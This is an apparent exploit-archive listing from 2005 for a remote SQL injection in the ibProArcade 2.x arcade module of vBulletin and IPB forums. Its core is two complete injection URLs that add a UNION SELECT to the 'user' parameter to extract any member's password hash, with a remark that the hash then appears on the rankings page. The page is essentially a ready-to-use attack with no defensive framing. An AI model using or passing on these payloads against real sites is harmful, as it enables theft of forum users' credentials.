[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit
# Published : 2005-11-06
# Author : B~HFH
# Previous Title : ATutor 1.5.1pl2 SQL Injection / Command Execution Exploit
# Next Title : VuBB Forum RC1 (m) Remote SQL Injection Exploit


# Rankings for (name) will state the md5 hash for the user /str0ke
# ibProArcade 2.x

IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Author: B~HFH
Email:  bhfh01@gmail.com

# www.Syue.com [2005-11-06]